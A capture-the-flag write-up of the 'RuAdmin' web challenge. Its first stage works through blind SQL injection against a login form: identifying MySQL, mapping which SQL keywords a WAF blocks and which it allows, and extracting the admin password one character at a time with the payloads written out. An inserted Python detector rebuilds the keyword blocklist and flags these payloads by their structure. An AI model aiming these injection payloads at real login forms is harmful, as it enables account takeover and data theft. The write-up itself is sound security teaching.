Tags: web sqli
Rating:
# ▼▼▼RuAdmin (1000 points, 2/123 = 1.6%)▼▼▼
**This writeup is written by [@kazkiti_ctf](https://twitter.com/kazkiti_ctf)**
## ▼Stage1: Blind SQL injection
### 【Identify the vulnerability】
POST `/sessions`
↓
`username`=**'or'1'='0'#**&`password`=test ⇒ Login failed
`username`=**'or'1'='1'#**&`password`=test ⇒ Login success
↓
**Blind SQL injection !!**
Also, there was a message saying that you should log in with `admin`'s privileges, and the page redirects to `/admin`.
↓
`/admin` has a login function but **no vulnerability.**
---
### 【Attack scenario】
I will extract admin's login credentials via blind SQL injection at `/sessions`, then log in at `/admin`.
---
### 【Identify the Database】
`username`=**'or''=''--**&`password`=test ⇒ 500 error
`username`=**'or''=''--+**&`password`=test ⇒ Login success (`--` needs a trailing space to act as a comment)
↓
**MySQL !!**
---
### 【Identify the WAF】
```
username=like&password=a ⇒hacking detected( `like`)
username=REGEXP&password=s ⇒hacking detected( `regexp`)
username=mid&password=s ⇒hacking detected( `mid`)
username=STRCMP&password=s ⇒hacking detected( `STRCMP`)
username=INSTR&password=s ⇒hacking detected( `INSTR`)
username=POSITION&password=s ⇒hacking detected( `POSITION`)
username=LOCATE&password=s ⇒hacking detected( `LOCATE`)
username=LPAD&password=s ⇒hacking detected( `LPAD`)
username=concat&password=s ⇒hacking detected( `concat`)
username=substr&password=s ⇒hacking detected( `substr`)
username=hex&password=s ⇒hacking detected( `hex`)
username=right&password=s ⇒hacking detected( `right`)
username=left&password=s ⇒hacking detected( `left`)
username=ascii&password=s ⇒hacking detected( `ascii`)
username=conv&password=s ⇒hacking detected( `conv`)
username=and&password=s ⇒hacking detected( `and`)
username=information_schema.tables&password=s ⇒hacking detected( `information_schema.tables`)
```
↓
These keywords are blocked by a WAF.
---
```
username=or&password=s ⇒username or password is invalid (I can use `or`)
username=in&password=s ⇒username or password is invalid (I can use `in`)
username=if&password=s ⇒username or password is invalid (I can use `if`)
username=length&password=s ⇒username or password is invalid (I can use `length`)
username=ord&password=s ⇒username or password is invalid (I can use `ord`)
username=%26%26&password=s ⇒username or password is invalid (I can use `&&`: Substitution of `and`)
```
↓
These tokens are allowed, so they can be used instead of the blocked ones.
---
### 【Identify the number of rows】
`username`='or id=0# ⇒ Login success!!
`username`='or id=1# ⇒ Login success!!
`username`='or id=2# ⇒ Login failed!!
`username`='or id>2# ⇒ Login failed!!
↓
2 rows !!
---
### 【Identify column names】
`username`='or+length(username)>1# ⇒Login success( `username`!!)
`username`='or+length(password)>1# ⇒Login success( `password`!!)
---
### 【Identify admin's username】
`username`='or id=1%26%26username='admin'# ⇒Login success(id=1 is `admin`)
---
### 【Identify admin's password】
`username`='or+id=1%26%26length(password)=13# ⇒ Login success (admin's password is 13 characters)
`username`='or+id=1%26%26ord(password)=73# ⇒ I
`username`='or+id=1%26%26ord(ltrim(replace(password,'I','')))=95# ⇒ _
... (abridged) ...
`username`='or+id=1%26%26ord(ltrim(replace(password,'I_l0v3_Applz','')))=95# ⇒ _
↓
admin's password is `I_l0v3_Applz_`
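The WAF probes above show a keyword blocklist that stops `and`, `substr`, `ascii` and friends but lets `or`, `&&`, `if`, `length`, `ord` (plus `ltrim`/`replace`) through, which is exactly what the extraction payloads rely on. The following added example (my own code, not part of the original writeup or the challenge) reconstructs that blocklist, runs it over a constructed access-log sample containing the payloads from this page, and shows that a check on SQL structure (quote-then-`or`, `&&`, a trailing comment terminator, calls to the allowed functions) flags every payload the keyword list missed; the log format and function names are assumptions for illustration.

```python
import re
from urllib.parse import parse_qs

# Keyword blocklist reconstructed from the probes above (every token the WAF answered with "hacking detected").
BLOCKED_KEYWORDS = {
    "like", "regexp", "mid", "strcmp", "instr", "position", "locate", "lpad", "concat",
    "substr", "hex", "right", "left", "ascii", "conv", "and", "information_schema.tables",
}

# Structural signals shared by the working payloads above, which a keyword list never looks at:
# a quote closing the literal followed by OR, the && substitute for AND, a trailing MySQL
# comment terminator, and calls to the functions the WAF let through.
STRUCTURAL_PATTERNS = [
    re.compile(r"'\s*(or|\|\|)\b", re.I),
    re.compile(r"&&"),
    re.compile(r"(#|--)\s*$"),
    re.compile(r"\b(ord|length|if|ltrim|replace)\s*\(", re.I),
]

def waf_keyword_check(value: str) -> bool:
    """Mimic the page's WAF: True if any blocked keyword occurs as a substring (case-insensitive)."""
    lowered = value.lower()
    return any(keyword in lowered for keyword in BLOCKED_KEYWORDS)

def structural_check(value: str) -> bool:
    """True if the value carries SQL structure rather than a plain credential."""
    return any(pattern.search(value) for pattern in STRUCTURAL_PATTERNS)

def triage(log_text: str) -> list:
    """Return the login attempts that pass the keyword WAF but trip the structural check."""
    findings = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        method, path, body = line.split(" ", 2)  # constructed format: "<method> <path> <form body>"
        # parse_qs splits on raw '&' first, so %26%26 inside a value survives and decodes to '&&'
        username = parse_qs(body, keep_blank_values=True).get("username", [""])[0]
        if not waf_keyword_check(username) and structural_check(username):
            findings.append({"path": path, "username": username})
    return findings

# Constructed access-log sample: one benign login, two WAF probes, three of the payloads above.
SAMPLE_LOG = """\
POST /sessions username=admin&password=hunter2
POST /sessions username=like&password=a
POST /sessions username='or'1'='1'#&password=test
POST /sessions username=length&password=s
POST /sessions username='or+id=1%26%26length(password)=13#&password=test
POST /sessions username='or+id=1%26%26ord(ltrim(replace(password,'I','')))=95#&password=test
"""

if __name__ == "__main__":
    for finding in triage(SAMPLE_LOG):
        print(finding)
```

Note that the bare probe `username=length` is correctly left alone by both checks: a word alone is not SQL, which is why a blocklist of words is the wrong abstraction and a parameterized query remains the actual fix.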
---
### 【Login at /admin】
`username`=admin&`password`=I_l0v3_Applz_ ⇒ Login success
---
## ▼Stage2: Rails Asset Pipeline Directory Traversal Vulnerability (CVE-2018-3760)
### 【function】
There is an upload function, and the upload folder path is displayed.
---
I cannot solve stage 2...
I look forward to someone's writeup.